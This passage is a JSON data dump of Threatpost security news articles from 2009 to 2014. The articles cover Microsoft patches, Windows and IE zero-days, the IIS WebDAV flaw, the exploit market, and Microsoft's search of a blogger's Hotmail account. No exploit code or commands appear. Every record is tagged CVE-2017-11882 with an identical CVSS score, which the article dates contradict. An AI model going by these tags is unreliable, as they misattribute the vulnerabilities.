Read more [at ZDNet Zero Day](<http://blogs.zdnet.com/security/?p=3503>).\n", "cvss3": {}, "published": "2009-06-04T18:02:33", "type": "threatpost", "title": "Coming on MS Patch Tuesday: 10 bulletins, 6 critical", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:08", "id": "THREATPOST:0ACA8133652DA5D5C5D027A4F9EED75A", "href": "https://threatpost.com/coming-ms-patch-tuesday-10-bulletins-6-critical-060409/72733/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:07:16", "description": "Microsoft\u2019s security response team is investigating the release of a new zero-day flaw that exposes Windows 7 users to blue-screen crashes or code execution attacks.\n\nThe flaw could be exploited by local attackers to cause a denial-of-service or potentially gain elevated privileges, according to an advisory from VUPEN, a French security research outfit.\n\nFrom VUPEN\u2019s advisory:\n\n_This issue is caused by a buffer overflow error in the \u201cCreateDIBPalette()\u201d function within the kernel-mode device driver \u201cWin32k.sys\u201d when using the \u201cbiClrUsed\u201d member value of a \u201cBITMAPINFOHEADER\u201d structure as a counter while retrieving Bitmap data from the clipboard, which could be exploited by malicious users to crash an affected system or potentially execute arbitrary code with kernel privileges._\n\nThe flaw is confirmed on fully patched Microsoft Windows 7, Windows Server 2008 SP2, Windows Server 2003 SP2, Windows Vista SP2, and Microsoft Windows XP SP3.\n\nMicrosoft plans to issue 13 bulletins with patches for 34 vulnerabilities tomorrow (Tuesday August 10) but it is unlikely we will see a fix for this new issue.\n", "cvss3": {}, "published": "2010-08-09T13:39:48", "type": "threatpost", "title": "Another Windows 7 Zero-Day Released", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": 
"2013-04-17T16:36:22", "id": "THREATPOST:1071D90B9DDF02B6FC796EE160E0AFDD", "href": "https://threatpost.com/another-windows-7-zero-day-released-080910/74306/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:02", "description": "\n\nEven for the most experienced security professionals, understanding complex attacks and vulnerabilities sometimes can be a serious challenge. A perfect example is the recent Microsoft IIS WebDAV vulnerability, which surfaced last week and has yet to be patched by Microsoft. It\u2019s a complicated issue, which some experts say was made more so by the guidance that the software maker released about it. Luckily, [Steve Friedl of Unixwiz.net](<http://unixwiz.net/techtips/ms971492-webdav-vuln.html>) has taken the time to make some sense of it all.\n\nFriedl, a security consultant, put together a flow chart that helps administrators figure out whether their Web servers are vulnerable. His key piece of advice is, if you\u2019re not sure whether your servers are at risk, find an expert who can test your machines and give you a definitive answer.\n\nThe vulnerability allows a remote anonymous user to bypass authentication checks and access the system in ways not intended for anonymous users: systems **are** getting hacked with this, and it\u2019s important to assess your local security posture and take steps to mitigate exposures that are discovered.\n\nMicrosoft published information on this in their [ Security Advisory (971492)](<http://www.microsoft.com/technet/security/advisory/971492.mspx>), but we found their guidance confusing for users who were not IIS experts. 
While researching what each of the pieces meant, we decided to create this Tech Tip with a simple flowchart that will help rapidly get to the \u201cnot vulnerable\u201d stage if that\u2019s indeed the case.\n\nMost systems are likely not vulnerable, but unless the flowchart below leads to \u201cYou are not vulnerable\u201d, we strongly recommend seeking local expertise to help assess your situation properly.\n\nAs Friedl and others have noted, attackers are actively exploiting the IIS WebDAV vulnerability, and as there\u2019s no patch available yet, it\u2019s vital that enterprises take a close look at their Web servers to see whether they\u2019re vulnerable. Microsoft officials have said they\u2019re investigating the vulnerability and it would not be surprising to see an out-of-band patch for IIS, given the seriousness of the problem.\n", "cvss3": {}, "published": "2009-05-28T14:11:35", "type": "threatpost", "title": "A guide to the IIS WebDAV vulnerability", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:07", "id": "THREATPOST:EC55500DAF9E1467C9C94C82758F810C", "href": "https://threatpost.com/guide-iis-webdav-vulnerability-052809/72745/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:24", "description": "_Editor\u2019s Note: This is the second of a [two-part](<https://threatpost.com/how-free-market-fails-privacy-conscious-consumers-040412/>) podcast with independent security researcher Chris Soghoian. _\n\nIn the [first part](<https://threatpost.com/how-free-market-fails-privacy-conscious-consumers-040412/>) of our podcast with independent security researcher Chris Soghoian, we talked about the way that the proliferation of \u201cfree\u201d applications have forced consumers into the position of increasingly trading privacy for access to cool new Web sites and tools. 
The market, Soghoian argued, has failed to provide choice to consumers who may want to participate in social networks, but don\u2019t want their online activities passed along to advertisers.\n\nIn the second half of his interview with Threatpost Editor Paul Roberts, Chris switched focus from consumer protections from advertisers, to the fast-growing market for surveillance products.\n\n<https://media.threatpost.com/wp-content/uploads/sites/103/2012/04/07052336/chris_soghoian-_part2.mp3>\n\nAs Soghoian sees it, the public sector \u2013 both government and law enforcement \u2013 has abrogated its responsibility to protect consumers from online predation. Why, you might ask? In Soghoian\u2019s view, the government turns a blind eye to insecure computers because those same insecure systems might provide access to law enforcement or intelligence services, should they need it.\n\nIt\u2019s a daring claim, and one that\u2019s difficult to prove, because so much of the dealing in undocumented (\u201czero day\u201d) software vulnerabilities happens behind the scenes. Even published reports about information on exploitable holes in popular devices (like the [recent Forbes report about an Apple iOS zero day that sold for $250,000](<http://www.forbes.com/sites/andygreenberg/2012/03/23/shopping-for-zero-days-an-price-list-for-hackers-secret-software-exploits/>)) are often attributed to unnamed sources and impossible to verify. What is clear, Soghoian says, is that the discovery and publication of information on software holes in popular platforms [like Internet Explorer](<https://threatpost.com/ie-9-falls-pair-zero-days-pwn2own-030812/>) has gone from an open and mostly volunteer activity by a small cadre of experts to a burgeoning and mostly underground market between researchers and software firms or, increasingly, independent middlemen. 
The market itself is worth tens, if not hundreds, of millions of dollars.\n\nSoghoian said the public expects intelligence agencies to engage in digital spycraft.\n\n\u201cI\u2019m not naive enough to believe governments can be stopped from doing this,\u201d Soghoian said. \u201cNSA is always going to be able to hack into people\u2019s systems and there\u2019s nothing we can do to stop this.\u201d\n\nBut the global trade in exploits by private firms, [such as Vupen Security](<https://threatpost.com/ie-9-falls-pair-zero-days-pwn2own-030812/>) and other firms, is another matter, he claims.\n\n\u201cIf you think our own intelligence agencies can be trusted, maybe you don\u2019t think foreign intelligence agencies can. And U.S. middleman firms are providing these flaws to these agencies.\u201d\n\nSoghoian is not the first authority to raise the red flag on for-profit vulnerability and exploit sales. At the CANSECWEST security show in Vancouver, [Chaouki Bekrar of VUPEN security defended his company\u2019s sales of exploitable security holes to private customers](<https://threatpost.com/chaouki-bekrar-man-behind-bugs-030912/>). Bekrar told Threatpost at that show that VUPEN would be holding on to a memory corruption flaw in IE\u2019s protected mode sandbox for itself and its customers. It can be reused in combination with other bugs in IE for future sales, much to the consternation of security researchers.\n\nJust as troubling, Soghoian says, is the growing use of digital surveillance tools by even state and local authorities.\n\n\u201cThe Keystone cop is not an expert in information security,\u201d he said.\n\nRather than tolerate widespread insecurity on both laptop and mobile devices, governments \u2013 including the U.S. 
government \u2013 should use their full weight to encourage better online security, including automated patching and software updates to remove exploitable holes, he said.\n\nCheck out the rest of [Threatpost\u2019s interview with Chris Soghoian here](<https://threatpost.com/arms-race-zero-days-spells-trouble-privacy-public-safety-040512/>).\n", "cvss3": {}, "published": "2012-04-05T11:30:00", "type": "threatpost", "title": "Arms Race In Zero Days Spells Trouble For Privacy, Public Safety", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-07-18T19:20:47", "id": "THREATPOST:4E345D523AA3EF8D5D06880D1063B0C6", "href": "https://threatpost.com/arms-race-zero-days-spells-trouble-privacy-public-safety-040512/76400/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:08:16", "description": "Microsoft has released a one-click \u201cfix-it\u201d workaround to help Internet Explorer users block malware attacks against an unpatched browser vulnerability.\n\nThe Fix-It workaround, [available here](<http://support.microsoft.com/kb/981374>), effectively disables peer factory in the iepeers.dll binary in affected versions of Internet Explorer. 
\n\nThe workaround comes on the heels of the [public release of exploit code](<https://threatpost.com/exploit-code-published-latest-ie-zero-day-031010/>) into the freely available Metasploit pen-testing framework.\n\nMicrosoft acknowledged the availability of exploit code for the issue and again urged users to upgrade to Internet Explorer 8, which is not vulnerable to this issue.\n\nThe company urged IE users to test the Fix-It workaround thoroughly before deploying as certain functionality that depends on the peer factory class, such as printing from Internet Explorer and the use of web folders, may be affected.\n\nMicrosoft also [confirmed](<http://blogs.technet.com/msrc/archive/2010/03/12/update-on-security-advisory-981374.aspx>) it is considering an out-of-band emergency patch to correct the underlying flaw.\n\nWe have seen speculation that Microsoft might release an update for this issue out-of-band. I can tell you that we are working hard to produce an update which is now in testing. This is a critical and time intensive step of the process as the update must be tested against all affected versions of Internet Explorer on all supported versions of Windows. Additionally, each supported language version needs to be tested as well as testing against thousands of third party applications. We never rule out the possibility of an out-of-band update. When the update is ready for broad distribution, we will make that decision based on customer needs. \n\nMalicious hackers are already exploiting the vulnerability to launch targeted attacks. 
The earliest attacks include the use of a backdoor that allows complete access to a vulnerable machine.\n\nThe backdoor allows an attacker to perform various functions on the compromised system, including uploading and downloading files, executing files, and terminating running processes.\n", "cvss3": {}, "published": "2010-03-15T14:17:12", "type": "threatpost", "title": "Microsoft Issues Fix-It Workaround for IE Zero-Day", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T13:14:29", "id": "THREATPOST:14B2B02CB661C8C7E1BC1204495F0D25", "href": "https://threatpost.com/microsoft-issues-fix-it-workaround-ie-zero-day-031510/73686/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:04", "description": "Microsoft has confirmed the reported [vulnerability in the WebDAV implementation in IIS 5.0, 5.1 and 6.0](<http://www.microsoft.com/technet/security/advisory/971492.mspx>), saying that the flaw could be used to bypass the authentication mechanism on the Web server. However, the company said that there are a number of mitigating factors involved and that company security officials have not seen any attacks against the weakness so far.\n\nMicrosoft officials said that the vulnerability is mitigated by several things, including the fact that WebDAV is not enabled by default on IIS 6.0. However, the WebDAV protocol is widely used to share documents and information on Web servers. Normally implemented access control lists (ACLs), which prevent users from accessing files that they do not have permission to access, also would limit the damage of an attack.\n\nThe company also said that the vulnerability affects versions 5.0 and 5.1 of IIS, along with 6.0, which was the version that had been reported to be vulnerable originally. 
The most effective workaround until a patch is available is to disable WebDAV.\n", "cvss3": {}, "published": "2009-05-19T13:59:37", "type": "threatpost", "title": "Microsoft confirms flaw in WebDAV in IIS", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:13", "id": "THREATPOST:FAE0DDDC6420E9881C1D719E13B77095", "href": "https://threatpost.com/microsoft-confirms-flaw-webdav-iis-051909/72674/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:10", "description": "Late last week it emerged that Microsoft had searched through the contents of a French blogger\u2019s Hotmail account in order to track down the source of a leak of proprietary information from the Redmond, Wash., tech giant.\n\nThe Electronic Frontier Foundation and transparency advocates have expressed stark disapproval of the entire situation. The EFF is even suggesting that Microsoft\u2019s actions here constitute[ a direct violation of the Electronic Communications Privacy Act](<https://www.eff.org/deeplinks/2014/03/microsoft-says-come-back-warrant-unless-youre-microsoft>) (ECPA).\n\nThe saga began when a Microsoft employee named Alex Kibkalo allegedly stole protected information pertaining to Microsoft\u2019s Activation Server Software Developer\u2019s Kit (SDK) and emailed it \u2013 via Hotmail, which is owned and operated by Microsoft \u2013 to a French blogger.\n\nAround August 2012, Microsoft became aware that someone had leaked the SDK after the blogger in question \u2013 who is not named in the criminal complaint filed against Kibkalo in September 2012 \u2013 began posting screenshots of unreleased Windows operating system features. 
Microsoft\u2019s Trustworthy Computing Investigations (TWCI), the division of the company tasked with protecting it against both external and internal threats, launched an investigation accordingly.\n\nIn early September 2012, an unnamed person contacted former president of the Windows Division of Microsoft, Steven Sinofsky. This source had been contacted by the blogger in order to confirm that the code he had received was in fact proprietary Microsoft code. In an interview with the TWCI, the source indicated that the blogger had contacted the source via Hotmail.\n\nAccording to the complaint (which was acquired by the [Register](<http://regmedia.co.uk/2014/03/20/kibkalo-complaint.pdf>)), \u201cAfter confirmation that the data was Microsoft\u2019s proprietary trade secret, on September 7, 2012 Microsoft\u2019s Office of Legal Compliance (OLC) approved content pulls of the blogger\u2019s Hotmail account.\u201d\n\nUpon examining the contents of the blogger\u2019s email account, Microsoft found Kibkalo\u2019s correspondence with the blogger. The company then provided all of this information to the FBI, who then arrested Kibkalo and charged him with the theft of trade secrets.\n\nMicrosoft published a response to the emergence of these facts, noting that it would make certain changes to its policies, but ultimately defending its right to search the contents of its users\u2019 communication without legal oversight.\n\n\u201cCourts do not, however, issue orders authorizing someone to search themselves, since obviously no such order is needed,\u201d wrote John Frank, deputy general counsel and vice president of legal and corporate affairs. 
\u201cSo even when we believe we have probable cause, there\u2019s not an applicable court process for an investigation such as this one relating to the information stored on servers located on our own premises.\u201d\n\nFrank goes on to claim that the company acted within its terms of service by conducting \u201ca limited review of this third party\u2019s Microsoft operated accounts,\u201d which the company only undertakes in \u201cthe most exceptional circumstances\u201d after \u201c[applying] a rigorous process before reviewing such content.\u201d\n\nFrank also notes the company\u2019s understanding of public concern regarding their actions, and thus, the company says it will adhere to the following policies moving forward:\n\n * Microsoft will not conduct a search of customer email and other services unless the circumstances would justify a court order, if one were available.\n * To ensure compliance with the standards applicable to obtaining a court order, Microsoft will rely in the first instance on a legal team separate from the internal investigating team to assess the evidence. It will move forward only if that team concludes there is evidence of a crime that would be sufficient to justify a court order, if one were applicable. As a new and additional step, the company will then submit this evidence to an outside attorney who is a former federal judge. It will conduct such a search only if this former judge similarly concludes that there is evidence sufficient for a court order.\n * Even when such a search takes place, it is important that it be confined to the matter under investigation and not search for other information. Microsoft says it will continue to ensure that the search itself is conducted in a proper manner, with supervision by counsel for this purpose.\n * Finally, the company believes it is appropriate to ensure transparency of these types of searches, just as it is for searches that are conducted in response to governmental or court orders. 
The company therefore will publish as part of its bi-annual [transparency report](<https://threatpost.com/microsoft-transparency-report-shows-company-supplied-user-content-22-cases-032113/77653>) the data on the number of these searches that have been conducted and the number of customer accounts that have been affected.\n\n\u201cUnfortunately, this new policy just doubles down on the Microsoft\u2019s indefensible and tone-deaf actions in the Kibkalo case,\u201d says EFF legal fellow, Andrew Crocker. \u201cIt begins with a false premise that courts do not issue orders in these circumstances because Microsoft was searching \u2018itself,\u2019 rather than the contents of its user\u2019s email on servers it controlled.\u201d\n\nHad the company believed it had probable cause to search one of its users\u2019 Hotmail accounts, Crocker continues, Microsoft could have easily presented its case to the FBI and acquired a proper search warrant.\n\n\u201cTo be sure, the process described in Microsoft\u2019s statement bears more than a passing resemblance to a standard criminal investigation, with a prosecutorial team building a case and then presenting it to an ostensibly neutral third party, a retired federal judge no less,\u201d Crocker writes. 
\u201cLet\u2019s call it Warrants for Windows!\u201d\n\nCrocker admits that while this search may have revealed criminal activity, it was also conducted in Microsoft\u2019s own self-interest, and, therefore, sets an extremely dangerous precedent.\n", "cvss3": {}, "published": "2014-03-24T12:55:29", "type": "threatpost", "title": "Microsoft Reads User Email without Warrant", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-03-24T16:55:29", "id": "THREATPOST:75108516B2230B2FA175C2B84083F4DF", "href": "https://threatpost.com/critics-upset-as-microsoft-conducts-email-search-in-leak-investigation/104969/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:20", "description": "Microsoft took less than a month to incorporate an [Oracle Outside In patch](<http://threatpost.com/hefty-oracle-july-critical-patch-update-contains-89-patches/101370>) and fix a critically rated remote code execution bug in Exchange Servers. The Microsoft patch is among three critical bulletins\u2014eight overall\u2014released today as part of [its August 2013 Patch Tuesday security updates](<http://blogs.technet.com/b/msrc/archive/2013/08/13/leaving-las-vegas-and-the-august-2013-security-updates.aspx>).\n\nOracle patched Outside In with its [July Critical Patch Update (CPU)](<http://www.oracle.com/technetwork/topics/security/cpujuly2013-1899826.html#AppendixFMW>); the technology allows developers to turn unstructured file formats into normalized files. [MS13-061](<https://technet.microsoft.com/en-us/security/bulletin/ms13-061>) includes the Outside In Patch, which is part of the WebReady Document Viewing and Data Loss Prevention features on Exchange Servers. Exploits could allow an attacker to remotely execute code if a user previews or opens a malicious file using Outlook Web App (OWA). 
The attacker would have the same privileges as the transcoding services on the Exchange Server; that would be the LocalService account for WebReady Document Viewing and the Filtering Management service for the DLP feature. Both, however, run with minimal privileges.\n\n\u201cIf you run Exchange and your users have OWA, you should address this issue as quickly as possible,\u201d said Qualys CTO Wolfgang Kandek. Microsoft also recommends a workaround that turns off Outside In document processing.\n\n[MS13-059](<https://technet.microsoft.com/en-us/security/bulletin/ms13-059>) is another cumulative patch for Internet Explorer and repairs 11 remotely executable vulnerabilities in the browser, including a sandbox bypass vulnerability discovered and exploited by VUPEN researchers during the Pwn2Own contest in March. IE 6-10 is vulnerable to exploit; Microsoft said it is not aware of any active exploits for any of these vulnerabilities.\n\nThe IE rollup includes patches for nine memory corruption vulnerabilities, as well as fixes for a privilege escalation flaw in the way in which the browser handles process integrity level assignment and an information disclosure cross-site scripting vulnerability in EUC-JP character encoding, Microsoft said.\n\n\u201cAs usual with IE vulnerabilities, the attack vector would be a malicious webpage, either exploited by the attacker or it could be sent to the victim in a spear-phishing e-mail,\u201d Kandek said. \u201cPatch this immediately as the highest priority on your desktop system and wherever your users browse the web.\u201d\n\nThe final critical bulletin, [MS13-060](<https://technet.microsoft.com/en-us/security/bulletin/ms13-060>), patches a Windows vulnerability in the Unicode Scripts Processor; the patch corrects the way Windows parses certain OpenType font characteristics. 
An exploit could allow an attacker to run code remotely if a user opens a malicious document or visits a website that supports OpenType fonts.\n\n\u201cA user would have to be induced to open a malicious file and this only affects Windows XP and 2003,\u201d said Ross Barrett, senior manager of security engineering at Rapid7. \u201cBoth of these issues should be patched ASAP.\u201d Microsoft also recommends two workarounds: either modifying the usp10.dll Access Control List to be more restrictive, or disabling support for parsing embedded fonts in IE.\n\nThe remaining bulletins were all rated Important by Microsoft.\n\n * [MS13-062](<https://technet.microsoft.com/en-us/security/bulletin/ms13-062>) patches a privilege escalation vulnerability in Windows RPC, correcting the manner in which Windows handles asynchronous RPC messages. \u201cPerhaps the most genuinely interesting vulnerability this month,\u201d Barrett said, adding that the bug is a post authentication issue in RPC. \u201cMicrosoft has described this as extremely difficult to exploit, which I can only assume is a challenge to exploit writers everywhere to prove them wrong.\u201d\n * [MS13-063](<https://technet.microsoft.com/en-us/security/bulletin/ms13-063>) is another privilege escalation issue in the Windows kernel. Four vulnerabilities are patched in this bulletin, the most severe of which enables elevated privileges if an attacker is able to log in locally and run a malicious application. In addition to memory corruption bugs, one of the vulnerabilities in this bulletin enables an attacker to bypass Address Space Layout Randomization (ASLR), a memory protection native to the OS.\n * [MS13-064](<https://technet.microsoft.com/en-us/security/bulletin/ms13-064>) patches a denial of service vulnerability in Windows NAT Driver. 
An attacker would have to send a malicious ICMP packet to a server running the NAT Driver services in order to exploit this bug, which affects only Windows Server 2012.\n * [MS13-065](<https://technet.microsoft.com/en-us/security/bulletin/ms13-065>) also fixes a denial of service bug in ICMPv6; Vista, Windows Server 2008, Windows 7, Windows 8, Windows RT and Windows Server 2012 are affected by this bug.\n * [MS13-066](<https://technet.microsoft.com/en-us/security/bulletin/ms13-066>) patches an information-disclosure vulnerability in Active Directory Federation Services on Windows Server 2008 and Windows Server 2012. An exploit could force the service to leak information on the service and allow an attacker to use that information to try to log in remotely.\n", "cvss3": {}, "published": "2013-08-13T14:28:51", "type": "threatpost", "title": "August 2013 Microsoft Patch Tuesday Security Updates", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-08-13T18:28:51", "id": "THREATPOST:270516BE92D218A333101B23448C3ED3", "href": "https://threatpost.com/microsoft-august-patch-tuesday-addresses-critical-ie-exchange-and-windows-flaws/101981/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:46", "description": "Microsoft has announced the [three finalists](<http://www.microsoft.com/security/bluehatprize/finalists.aspx>) for its $200,000 [Blue Hat Prize](<https://threatpost.com/microsoft-pay-200000-innovative-defense-technology-blue-hat-prize-program-080311/>) contest and all three of the researchers in the running for the win submitted technologies designed to defeat ROP (return-oriented programming) exploits. 
Each of the entrants takes a different tack with his ROP defense and it will be another month before Microsoft announces at Black Hat which of them will take home the $200,000 top prize.\n\nThe Blue Hat Prize, which Microsoft announced at Black Hat last summer, offers researchers cash prizes for innovative defensive technologies. In some ways, it is Microsoft\u2019s response to all of the bug-bounty programs that other vendors have started in the last couple of years. Companies such as Google, Barracuda, Firefox and others have been paying researchers varying amounts for vulnerabilities that researchers disclose to them privately. Microsoft officials have said repeatedly that the company will not pay bug bounties and instead introduced Blue Hat Prize to spur innovation in defensive technologies.\n\n\u201cWhen we looked at the various economic incentive models, the bug bounty was among them. But when we looked at what researchers were doing with the bugs they found in our products across the board, we found that there were a lot more motivations for researchers than just money,\u201d Katie Moussouris, senior security strategist in Microsoft\u2019s Trustworthy Computing Group, said at the time of the initial announcement last year. \u201cThere\u2019s recognition and there\u2019s what I call the pursuit of intellectual happiness, just the act of finding these issues.\u201d\n\nOne of the problems that Microsoft officials mentioned as being ripe for innovations is that of ROP exploits. The three finalists for the first Blue Hat Prize are Jared DeMott, Ivan Fratric and Vasillis Pappas. Each of them submitted techniques for defeating or mitigating ROP exploits. Under the rules of the contest, the researcher who wins the top prize will have to agree to license the technology to Microsoft, but he will retain the rights to the technology, as well. 
\n\n\u201c[We received 20 entries](<http://blogs.technet.com/b/ecostrat/archive/2012/04/04/bluehat-prize-entries-the-final-tally-is.aspx>) to our inaugural BlueHat Prize contest, a response and participation from the security research community that exceeded our expectations. We now know contestants emerged from different areas of the security community \u2013 some from academia, some recognized names in the hacker community, and some from other venues entirely,\u201d [Moussouris](<http://blogs.technet.com/b/ecostrat/>) wrote on Thursday.\n\nThe winner, who will get $200,000, will be announced at the company\u2019s party at Black Hat in July. The second prize winner will get $50,000 and the third-prize winner gets an MSDN subscription. All three will fly to Las Vegas on Microsoft\u2019s dime for the announcement.\n", "cvss3": {}, "published": "2012-06-21T15:41:28", "type": "threatpost", "title": "Microsoft Reveals Blue Hat Prize Finalists", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:31:59", "id": "THREATPOST:A1A03F8D19A1212209F2765F29BE892C", "href": "https://threatpost.com/microsoft-reveals-blue-hat-prize-finalists-062112/76722/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:24", "description": "When Mark Dowd and Alex Sotirov demonstrated a technique for [bypassing Vista\u2019s memory protections](<http://taossa.com/archive/bh08sotirovdowd.pdf>) at Black Hat last year, the security community was stunned. 
Microsoft officials said at the time they were working on ways to defeat the pair\u2019s attack and now that protection has arrived, in the form of Internet Explorer 8.\n\nDowd (above, right), who works for IBM ISS in Australia, says in a blog post that the improvements that Microsoft has made in the [security of IE 8](<http://blogs.iss.net/archive/chicksdigIE8.html>) have the effect of preventing the memory-bypass attacks from working.\n\n\u201cBasically, the fix is simple: Loading .NET controls has been associated with a special privilege that users can enable or disable \u2013 and in the default configuration for the \u201cInternet Zone\u201d (the Medium-High setting), .NET controls have been disabled,\u201d Dowd writes.\n\nThe attack that Dowd and Sotirov (above, left) showed off at Black Hat was complex, but the basic premise is that they were able to load a .Net control onto a Web page into a location of their choosing, and with whatever permissions they chose. This allowed them to get around two of the main memory protections in Windows Vista, ASLR (Address Space Layout Randomization) and DEP (Data Execution Prevention). These two technologies are a major part of the security upgrades that Microsoft added to Vista, and Dowd and Sotirov\u2019s attack was seen as a breakthrough.\n\nBut now, with the addition of the new permission to IE 8, Microsoft has put a stop to that particular attack. As [Jonathan Ness](<http://blogs.technet.com/srd/archive/2009/03/23/released-build-of-internet-explorer-8-blocks-dowd-sotirov-aslr-dep-net-bypass.aspx>) of the Microsoft Security Response Center writes in his blog on IE 8 security, \u201cThe final release of Internet Explorer 8 on Windows Vista blocks the .NET DEP+ASLR bypass mechanism from malicious websites on the Internet. Specifically, IE8 created a new URLAction that regulates loading of the .NET MIME filter. By default, the URLAction prevents it from loading in the Internet and Restricted Sites Zones. 
The .NET MIME filter is allowed to load by default in the Intranet Zone.\u201d \n\n\n\nThis is a nice advance for Microsoft and for its customers. IE for years has been seen as by far the least secure of the major browsers, but that perception may be shifting now. At last week\u2019s CanSecWest conference, the hackers in the Pwn2Own contest went right after Safari, believing that IE 8 on Vista was too tough to crack. It eventually went down, surprising many of the researchers in attendance.\n\nThis is all to the good, as Dowd writes.\n\n\u201cSo, the net effect (no pun intended) of this change is that by default, our technique will no longer work in its current form against IE8 browsers in their default configuration. There are also a number of other security enhancements in IE8,\u201d he writes. \u201cMost notably, the browser now runs in \u2018Protected Mode.\u2019 Essentially, this means that the browsing process runs in a sandbox of sorts with a restricted set of privileges. (Internally, this is implemented by utilizing Vista\u2019s \u2018Low Integrity\u2019 mode and communicating to a broker process via an out of process COM server. But, that is the topic of another post.) Furthermore, DEP has been enabled in IE8, which is a big change from IE7. This means that IE8 now fully reaps the benefits of the Vista memory protections. Hacking it is going to be hard! .. 
Probably!\u201d\n", "cvss3": {}, "published": "2009-03-26T18:27:42", "type": "threatpost", "title": "IE8 security stops memory bypass attacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:25", "id": "THREATPOST:17ABCE7BEBAC56FCA5601686C9601728", "href": "https://threatpost.com/ie8-security-stops-memory-bypass-attacks-032609/72537/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:51", "description": "Microsoft is warning users about targeted attacks against a new vulnerability in several versions of Windows and Office that could allow an attacker to take over a user\u2019s machine. The bug, which is not yet patched, is being used as part of targeted attacks with malicious email attachments, mainly in the Middle East and Asia.\n\nIn the absence of a patch, Microsoft has released a FixIt tool for the vulnerability, which prevents exploits against the vulnerability from working. The bug affects Windows Vista, Windows Server 2008 and Microsoft Office 2003 through 2010.\n\n\u201cThe exploit requires user interaction as the attack is disguised as an email requesting potential targets to open a specially crafted Word attachment. If the attachment is opened or previewed, it attempts to exploit the vulnerability using a malformed graphics image embedded in the document. An attacker who successfully exploited the vulnerability could gain the same user rights as the logged on user,\u201d the Microsoft [advisory](<http://blogs.technet.com/b/msrc/archive/2013/11/05/microsoft-releases-security-advisory-2896666-v2.aspx>) says.\n\nThe vulnerability doesn\u2019t affect the current versions of Windows, the company said, and users who are running potentially vulnerable products can take a couple of actions in order to protect themselves. 
Installing the [FixIt tool](<http://technet.microsoft.com/en-us/security/advisory/2896666>) will help prevent exploitation, as will deploying the Enhanced Mitigation Experience Toolkit (EMET), which helps mitigate exploits against certain classes of bugs.\n\n\u201cThe vulnerability is a remote code execution vulnerability that exists in the way affected components handle specially crafted TIFF images. An attacker could exploit this vulnerability by convincing a user to preview or open a specially crafted email message, open a specially crafted file, or browse specially crafted web content. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights,\u201d Microsoft officials said.\n", "cvss3": {}, "published": "2013-11-05T14:07:32", "type": "threatpost", "title": "Microsoft Warns of Targeted Attacks on Windows 0-Day", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-11-05T19:07:32", "id": "THREATPOST:DF45F7CBB6E670440E0A14E517EA753D", "href": "https://threatpost.com/microsoft-warns-of-targeted-attacks-on-windows-0-day/102821/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:32", "description": "Microsoft gave its users steps earlier this week to sidestep a vulnerability in one of Oracle\u2019s Outside In libraries. The company published some mitigations for the bug, but said it isn\u2019t aware of any active attacks against it yet.\n\nThe Oracle technology is licensed by software developers like Microsoft to transform and control different types of file formats. Outside In is present in Microsoft\u2019s Exchange Server 2007, Exchange Server 2010 and FAST Search Server for Sharepoint products. 
